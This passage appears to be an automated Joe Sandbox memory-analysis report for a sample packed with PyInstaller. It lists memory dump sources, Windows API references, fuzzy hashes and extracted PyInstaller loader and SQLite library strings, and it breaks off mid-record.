                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                                                                • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                • Instruction ID: 0efd6df8aaa5e2b1059a6020ef1ebdec738c6e2cd5ea03de9292157ad21c3828
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98514D32A1CA828EE760FF25E8D25A96761FF88794F404135EE4DC7A9ADF3DE4418740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                                • API String ID: 0-3175670447
                                                                                                                                                                                                                                • Opcode ID: cddca66f908f9aaa025682cee3071d9b9b50d36bb3716add2159b42f250d3a01
                                                                                                                                                                                                                                • Instruction ID: 6c26d9984080e7fc4a36bff1635b2bf434f12fd28ca7725e8ec056fed6ce3585
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cddca66f908f9aaa025682cee3071d9b9b50d36bb3716add2159b42f250d3a01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F1A436B1878686E768AF25D090B6E77A0F784B88F124075DE6E877D8DF39D844CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875840
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875852
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875889
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487589B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758B4
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758C6
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758DF
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448758F1
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487590D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487591F
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487593B
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487594D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875969
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF64487597B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF644875997
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759A9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759C5
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6448764CF,?,00007FF64487336E), ref: 00007FF6448759D7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction ID: e726b319f87fac86e657827f38232fe81a3e5d189886ae629ab4691b479018e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F822A2A0A0DF47EAFB45FB55ACE257522A0BF94781F841435DC1E8266CEF3EF4599200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                • Instruction ID: 8e171445b0fa6372433932dfcf8b905ced7772f3c74ceed9d295bd9733f6e47c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C102A024A0DF47E9FA15FB59A9E25B423A1BF84B85F541031DC2E862ACEF3DF159C204
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9
                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6448786B7,?,?,00000000,00007FF644873CBB), ref: 00007FF64487822C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                • Opcode ID: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
                                                                                                                                                                                                                                • Instruction ID: 9c5d0225fd342e8fe4fe236ab1661b09eeb1239abcb5892c460514a2d240e855
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73517111B2CE4699FA50FB29ECE36BA62A0EF94784F445435DE0EC26DDEE3DE5048340
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                • Opcode ID: b18de5488a40a73e5e49fb6efa9ef8e011055d3291ac3e73bf4f51ef931bf382
                                                                                                                                                                                                                                • Instruction ID: 635ceeb1053f39f318ee80f1db6a56b6941fd15b0c0ac8b1c02c80825c6da8db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b18de5488a40a73e5e49fb6efa9ef8e011055d3291ac3e73bf4f51ef931bf382
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E519D21B0CA479AEA10BB61A8E35B96390BF84B94F544535EE0C87BDEEF3DE545D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FFDFAF1D940: 00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF1DAE7
                                                                                                                                                                                                                                  • Part of subcall function 00007FFDFAF1D440: 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D59A
                                                                                                                                                                                                                                  • Part of subcall function 00007FFDFAF1D440: 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFAF17857), ref: 00007FFDFAF1D617
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF84B42
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                                                                                                                                                                                                • API String ID: 1405196051-2234786739
                                                                                                                                                                                                                                • Opcode ID: 7fdef3433c8af9c56e06e0c8c5884f4f6a96688affdf847c3781df22cf6e3f60
                                                                                                                                                                                                                                • Instruction ID: 2dabde062793fb186ce195ecb0c681d064c720cdfa4e42467c922f161ceab43f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fdef3433c8af9c56e06e0c8c5884f4f6a96688affdf847c3781df22cf6e3f60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4B18B72B09B818AE728CF25D460AAE37B1FB49799F008275EA6C0B7DDDB38D155C704
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                • API String ID: 0-3733955532
                                                                                                                                                                                                                                • Opcode ID: 3c08afb9f4cf23902f2133180092d1d9b2eb9f4a5745907601206ded7f1cff2a
                                                                                                                                                                                                                                • Instruction ID: 6f3ebc17328e4a0c494fc99d10bbcf5b80e55318e57d06cfa3aea7e3a80bb0ea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c08afb9f4cf23902f2133180092d1d9b2eb9f4a5745907601206ded7f1cff2a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01028521B09A8385EB299B11E464BB97360FF46B90F484275DE6E4A7E9DF3CE544D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAF0B1E3
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDFAF0B2C4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                • API String ID: 1405196051-875588658
                                                                                                                                                                                                                                • Opcode ID: cc69c06e4579cc9a63790891c0cccc49fbb47746cba14d151e36a2bdd79a4d51
                                                                                                                                                                                                                                • Instruction ID: ef79afc256c93c9ba6dbe162cb3e57558404d5fc09c7bb731a2dab6b5b38a7f0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc69c06e4579cc9a63790891c0cccc49fbb47746cba14d151e36a2bdd79a4d51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE1B662F0856289FB25CF64D460BBC27A0AF04798F888275EE6F5B6DDDE3CA545C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • cannot add a STORED column, xrefs: 00007FFDFAF27B42
                                                                                                                                                                                                                                • Cannot add a UNIQUE column, xrefs: 00007FFDFAF2796C
                                                                                                                                                                                                                                • Cannot add a column with non-constant default, xrefs: 00007FFDFAF27A39
                                                                                                                                                                                                                                • Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDFAF279DF
                                                                                                                                                                                                                                • Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDFAF279BD
                                                                                                                                                                                                                                • UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDFAF27BE4
                                                                                                                                                                                                                                • SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDFAF279C7, 00007FFDFAF27A43, 00007FFDFAF27B51
                                                                                                                                                                                                                                • Cannot add a PRIMARY KEY column, xrefs: 00007FFDFAF27951
                                                                                                                                                                                                                                • SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDFAF27D2C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
                                                                                                                                                                                                                                • API String ID: 1405196051-200680935
                                                                                                                                                                                                                                • Opcode ID: de498d8ebdc1d8b11aa5bcc87f253d03924d12926c0a2cf90f6d28e521af2e8d
                                                                                                                                                                                                                                • Instruction ID: 4313b75c50a3f900d7f7d77d7eea2ea634697279e5685b60739e1f8781a23054
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de498d8ebdc1d8b11aa5bcc87f253d03924d12926c0a2cf90f6d28e521af2e8d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5E18F21B09B8285EB298B159564B7967A1FF42BE4F484271EEAD0B7DDDF3CE441C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction ID: 342efc223edf27d6efe885fa86135ee1c51794963c66c520f10f4686fe324ec9
